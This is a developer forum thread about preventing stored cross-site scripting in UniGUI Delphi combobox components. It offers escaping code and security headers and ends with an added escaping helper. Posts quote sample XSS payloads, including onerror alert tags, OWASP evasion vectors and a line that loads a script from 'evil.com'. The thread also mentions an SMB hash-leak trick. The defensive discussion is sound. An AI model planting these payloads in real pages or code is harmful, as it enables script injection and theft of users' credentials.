
How to prevent HTML/JavaScript code from running in TUniComboBox and TUniDBComboBox?


JamesP


Hello,
 

Columns of TUniDBGrid have the property AllowHtml, which is True by default. If I set it to False, it won't try to convert the HTML/JavaScript code of the field value when the DBGrid is refreshed.

If a "BAD" user saves the following text in a field value that is shown in TUniDBGrid, it won't load any alert dialog on screen (if column.AllowHtml=False):

">Desc<img src="x" onerror=alert("hello")>

Is there any possibility to do the same on TUniComboBox and TUniDBComboBox as well?

Because if TUniComboBox.Items has any line like (">Desc<img src="x" onerror=alert("hello")>), then when the user opens the combobox item list it will pop up a dialog.

Could you please help me out with the following issue I have got? Is there any solution to do the same as in TUniDBGrid's Column?

Thank you in advance.

Kind Regards


13 hours ago, irigsoft said:

I realized that onerror was set with javascript code by a "BAD" user.

If I'm right then any function could be called this way, am I wrong?

Let's say so, but what can this user run, what kind of malicious code?!


27 minutes ago, Sherzod said:

But again, what kind of malicious code do you think a user might run?

https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html

Malformed IMG Tags

Originally found by Begeek (but cleaned up and shortened to work in all browsers), this XSS vector uses the relaxed rendering engine to create our XSS vector within an IMG tag that should be encapsulated within quotes. I assume this was originally meant to correct sloppy coding. This would make it significantly more difficult to correctly parse apart HTML tags:

<IMG """><SCRIPT>alert("XSS")</SCRIPT>"\>

fromCharCode

If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need:

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

 

So maybe adding the XSS header is enough: https://www.keycdn.com/blog/x-xss-protection

 

 


Hi Sherzod and irigsoft,

Thank you for the suggestions. I understand that the system should stop (clean) that code before it gets into the system; I mean it should not be in the Items in the first place.

I created this topic for the reason I stated above: if there is already malicious code in the SQL table from which TUniComboBox takes its Items, how can I do something similar to what is implemented with TUniDBGrid.Column.AllowHtml := False, so that TUniComboBox won't try to convert Items to HTML?

There was an audit of our Web System and they identified several issues related to XSS. Our customers do not want to input any values like:

">Desc<img src="x" onerror=alert("hello")>

but if somebody wants to breach the system we have to deal with that and prevent it; again, I understand the system shouldn't allow this code to be entered into the system at all. You provided several links to articles which describe how to clean text of HTML tags. All those solutions are in JavaScript; I am not sure how to implement them in a UniGUI project.

If you can provide a piece of code that I can use in my Delphi code it would be very helpful. It would be very much appreciated.

The second type of issue is when the malicious code is already in the SQL tables and it got there through a different channel, not through our interface. We analyzed the system and found the following:

Entering the data (malicious code) into any TUniEdit or TUniMemo component doesn't do any harm, but if later those values appear in TUniDBGrid, TUniComboBox or TUniListBox, the system tries to execute the HTML/JavaScript code. I know how to deal with that in TUniDBGrid, but for TUniComboBox and TUniListBox I don't.

That's why I raised this topic. Could you please help with that?

Kind Regards


"maybe add XSS Header is enough"

or it is not enough!

1. you can attack some unpatched very old versions of Windows with the Metafile vulnerability present.

2. Yes, you can embed javascript directly into SVG.

This is not as dangerous as it sounds at first. Browsers that support SVG inside <img> tags do not support scripting inside the context. Ideally you should use SVG inside <embed> or <object> tags where scripting is supported by browsers. Yet, do not do it for user provided content!

3. allowing SVG inside <img src= may be dangerous: SVG opens several possible vectors to achieve execution context.

 <img src=a onerror=alert('XSS')> can be used to inject any arbitrary JavaScript

Example of BAD JavaScript: <img src=a onerror="x=document.createElement('script');x.src='https://evil.com/really_evil.js';document.body.appendChild(x)" />

4. If you use a file://hackersRus.org/file URL, IE will try to get the file using Windows file sharing (SMB). This sends the login name and hashed password to the hacker's machine. The hackers can then use those to attack back.

5. One attack that can be done that other answers have not covered is denial of service

"You are on a forum, and somebody posts a message which has an embedded <img src="/logout" /> - this leads to everyone being logged out when the image gets loaded. Now, none of the users can use the forum, as long as they see that page."

 

and so on; all of this is discussed here: https://security.stackexchange.com/questions/135513/what-could-an-img-src-xss-do

 

! "CSP stops this dead, highly recommended to take the time to create one.": https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy


13 minutes ago, JamesP said:

If you can provide a piece of code that I can use in my Delphi code it would be very helpful.

Hello, try to read all the information from my topic (you will find many examples and code for protection, even a parser).

 


23 minutes ago, JamesP said:

Could you please help with that

1. Add this header in UniGUIServerModuleHTTPCommand (block XSS):

AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

2. Parse (replace) all data that comes from components and goes into the database, in UniGUIServerModuleHTTPCommand (replace symbols on the server side):

// '&' must be replaced first, otherwise the '&' of the entities produced by
// the later lines would be escaped again (e.g. '<' -> '&lt;' -> '&amp;lt;').
// '#' is handled before the quote line because '&#x27;' contains a '#'.
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'&','&amp;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'#','&num;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'<','&lt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'>','&gt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'"','&quot;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'''','&#x27;',[rfReplaceAll]);

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'(','&lpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,')','&rpar;',[rfReplaceAll]);
// ';' cannot be escaped this way: every entity above ends with ';', so this
// line would corrupt them ('&lt;' -> '&lt&semi;').
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,';','&semi;',[rfReplaceAll]);
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,'/','&sol;',[rfReplaceAll]);

3. Add this code into MainForm.Script (replace symbols on the client side):

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};

and add this on every control where you want to use it:

//replace language symbols
TuniCombobox (YourComponent).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

4. Replace all symbols on the server side before the INSERT/UPDATE statement into the SQL database.

Please write back here if this code helped you or if you find any other solution.

 

 


21 minutes ago, irigsoft said:

Hello, try to read all the information from my topic (you will find many examples and code for protection, even a parser).

 

I had done it before I posted this topic. I added this code in my project several days ago:

  AResponseInfo.CustomHeaders.AddValue('X-Frame-Options', 'DENY');
  AResponseInfo.CustomHeaders.AddValue('Strict-Transport-Security', 'max-age=31536000; includeSubDomains; preload');
  AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

TUniComboBox is still an issue.

 


12 minutes ago, JamesP said:

TUniComboBox is still an issue.

Please try with all of my code above.

The problem with the combobox is that a user can write a "bad" script and this will be added into the database.

You can combat this problem with client-side and server-side character substitution.

 

Working on the Internet is a dangerous job, so you should always keep in mind that a user can enter malicious code on purpose, and everything coming from a user should be checked (I think this should always be kept in mind)!


20 minutes ago, irigsoft said:

1. Add this header in UniGUIServerModuleHTTPCommand (block XSS):

AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

2. Parse (replace) all data that comes from components and goes into the database, in UniGUIServerModuleHTTPCommand (replace symbols on the server side):

// '&' must be replaced first, otherwise the '&' of the entities produced by
// the later lines would be escaped again (e.g. '<' -> '&lt;' -> '&amp;lt;').
// '#' is handled before the quote line because '&#x27;' contains a '#'.
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'&','&amp;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'#','&num;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'<','&lt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'>','&gt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'"','&quot;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'''','&#x27;',[rfReplaceAll]);

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'(','&lpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,')','&rpar;',[rfReplaceAll]);
// ';' cannot be escaped this way: every entity above ends with ';', so this
// line would corrupt them ('&lt;' -> '&lt&semi;').
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,';','&semi;',[rfReplaceAll]);
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,'/','&sol;',[rfReplaceAll]);

3. Add this code into MainForm.Script (replace symbols on the client side):

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};

and add this on every control where you want to use it:

//replace language symbols
TuniCombobox (YourComponent).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

4. Replace all symbols on the server side before the INSERT/UPDATE statement into the SQL database.

Please write back here if this code helped you or if you find any other solution.

 

 

Sorry, I hadn't seen this post of yours yet when I responded previously:

-----------------------

I had done it before I posted this topic. I added this code in my project several days ago:

  AResponseInfo.CustomHeaders.AddValue('X-Frame-Options', 'DENY');
  AResponseInfo.CustomHeaders.AddValue('Strict-Transport-Security', 'max-age=31536000; includeSubDomains; preload');
  AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

TUniComboBox is still an issue.

-----------------------------------

I will try to implement it.

Thank you very much.

 


3 hours ago, irigsoft said:

1. Add this header in UniGUIServerModuleHTTPCommand (block XSS):

AResponseInfo.CustomHeaders.AddValue('X-XSS-Protection', '1; mode=block');

2. Parse (replace) all data that comes from components and goes into the database, in UniGUIServerModuleHTTPCommand (replace symbols on the server side):

// '&' must be replaced first, otherwise the '&' of the entities produced by
// the later lines would be escaped again (e.g. '<' -> '&lt;' -> '&amp;lt;').
// '#' is handled before the quote line because '&#x27;' contains a '#'.
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'&','&amp;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'#','&num;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'<','&lt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'>','&gt;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'"','&quot;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,'''','&#x27;',[rfReplaceAll]);

ARequestInfo.Document := StringReplace (ARequestInfo.Document,'(','&lpar;',[rfReplaceAll]);
ARequestInfo.Document := StringReplace (ARequestInfo.Document,')','&rpar;',[rfReplaceAll]);
// ';' cannot be escaped this way: every entity above ends with ';', so this
// line would corrupt them ('&lt;' -> '&lt&semi;').
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,';','&semi;',[rfReplaceAll]);
//ARequestInfo.Document := StringReplace (ARequestInfo.Document,'/','&sol;',[rfReplaceAll]);

3. Add this code into MainForm.Script (replace symbols on the client side):

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};

and add this on every control where you want to use it:

//replace language symbols
TuniCombobox (YourComponent).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

4. Replace all symbols on the server side before the INSERT/UPDATE statement into the SQL database.

Please write back here if this code helped you or if you find any other solution.

 

 

Hi irigsoft,

I have tried to implement the code as you suggested.

I added this into MainForm.Script:

//replace language symbols
function escapeHtml (text) {
  var map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#039;'
  };
  return text.replace(/[&<>"']/g, function(m) { return map[m]; });
};


Then in the OnReady event of MainForm:

procedure TMainForm.UniFormReady(Sender: TObject);
begin
  TuniCombobox(cbTesting1).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');
  TuniCombobox(cbTesting2).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

end;

Next, I have the button click event:

procedure TMainForm.UniButton20Click(Sender: TObject);
var
  sValue: string;
begin
  cbTesting2.Items.Clear;

  sValue := '<scripts>Do Something = onError("") </scripts>';
  cbTesting2.Items.Add(sValue);

  sValue := '">Desc<img src="x" onerror=alert("hello")>';
  cbTesting2.Items.Add(sValue);

  sValue := '">Desc<img src="x" onerror=alert("helloWorld")>';
  cbTesting2.Items.Add(sValue);
end;

At runtime:

When I click on UniButton20 and then click on the standard combo box trigger icon of cbTesting2, an alert pops up on screen.

If I select the second option, that is: ">Desc<img src="x" onerror=alert("hello")>

and then move the cursor to another component, cbTesting2.Text changes.

Then every time I click on cbTesting2 and then move away, the text is changed again.

I mean, & is replaced with &amp;, then again &amp; is replaced with &amp;amp;, etc.

If I expand the item list again, the alert message appears again.

The code: TuniCombobox(cbTesting2).JSInterface.JSAddListener('blur','function(){this.setValue(escapeHtml(this.getValue()))}');

replaces the text that's assigned to cbTesting2.Text and doesn't do anything to cbTesting2.Items.

I wonder if there is any way to replace the item value when it's assigned to Items and not to the Text of the ComboBox?

Thank you for helping, I really appreciate it.

Kind Regards.

 


1 hour ago, JamesP said:

It replaces the text that's assigned to cbTesting2.Text and doesn't do anything to cbTesting2.Items.

Yes, it works exactly that way.

On the client side, replace all symbols in the control.

This is step 1.

Step 2 is, before saving data into the database in the SQL script (on the server side), you must replace all these (HTML) symbols.

 

1 hour ago, JamesP said:

I wonder if there is any way to replace the item value when it's assigned to Items and not to Text of ComboBox?

If you already have saved data with "bad" code, then you must find it and replace it when loading the data into TComboBox.

If you use TDBComboBox then I think maybe @Sherzod will help here with JavaScript code.
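Putting irigsoft's two points together (the server-side StringReplace list from the earlier post, and this last point about replacing the symbols when the data is loaded into the combobox), here is an added Delphi example of the server-side piece JamesP asked for. It is not code from this thread or from the UniGUI project. It assumes a Delphi/UniGUI project in which TUniComboBox is declared in the uniComboBox unit; the names HtmlEscape and LoadEscapedItems, and the dataset and field names used in the usage note, are assumptions for illustration.

```delphi
// Added example, not code from the thread or from the UniGUI project.
// Assumes a Delphi/UniGUI project; HtmlEscape and LoadEscapedItems are
// illustrative names, and the uniComboBox unit name is an assumption.
unit ComboEscapeDemo;

interface

uses
  System.SysUtils, System.Classes, Data.DB, uniComboBox;

// Escape the five characters that can open or close HTML markup or an
// attribute value, so the browser shows them as text instead of parsing them.
function HtmlEscape(const S: string): string;

// Copy the values of AFieldName from ADataSet into ACombo.Items, escaping
// each one. The raw value stays in the database; only the copy handed to
// the client is escaped, so nothing is escaped twice.
procedure LoadEscapedItems(ACombo: TUniComboBox; ADataSet: TDataSet;
  const AFieldName: string);

implementation

function HtmlEscape(const S: string): string;
const
  // Order matters: '&' must be first. If '<' were turned into '&lt;' before
  // '&' is handled, the '&' of that entity would be escaped again to '&amp;lt;'.
  Raw: array[0..4] of string = ('&', '<', '>', '"', '''');
  Esc: array[0..4] of string = ('&amp;', '&lt;', '&gt;', '&quot;', '&#x27;');
var
  I: Integer;
begin
  Result := S;
  for I := Low(Raw) to High(Raw) do
    Result := StringReplace(Result, Raw[I], Esc[I], [rfReplaceAll]);
end;

procedure LoadEscapedItems(ACombo: TUniComboBox; ADataSet: TDataSet;
  const AFieldName: string);
var
  Field: TField;
begin
  Field := ADataSet.FieldByName(AFieldName);
  ACombo.Items.BeginUpdate;
  try
    ACombo.Items.Clear;
    ADataSet.First;
    while not ADataSet.Eof do
    begin
      // Escape at the moment the value is handed to the client component;
      // the stored value is left untouched.
      ACombo.Items.Add(HtmlEscape(Field.AsString));
      ADataSet.Next;
    end;
  finally
    ACombo.Items.EndUpdate;
  end;
end;

end.
```

Call it from UniFormReady instead of filling Items directly, for example LoadEscapedItems(cbTesting2, qryItems, 'Desc'), where qryItems and 'Desc' are placeholders for your own dataset and field. For the second item in JamesP's test, HtmlEscape returns &quot;&gt;Desc&lt;img src=&quot;x&quot; onerror=alert(&quot;hello&quot;)&gt;, which the dropdown shows as literal text rather than rendering the img tag. Because escaping happens only on the copy sent to the client, the value is escaped exactly once; if the selected text is later written back to the database, store the original value (for example by looking it up through the item index) rather than the combo's Text, otherwise each round trip adds another layer of escaping, which is exactly the &amp; to &amp;amp; growth JamesP observed with the blur listener. On Delphi XE7 or later, TNetEncoding.HTML.Encode from System.NetEncoding can be used in place of HtmlEscape.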

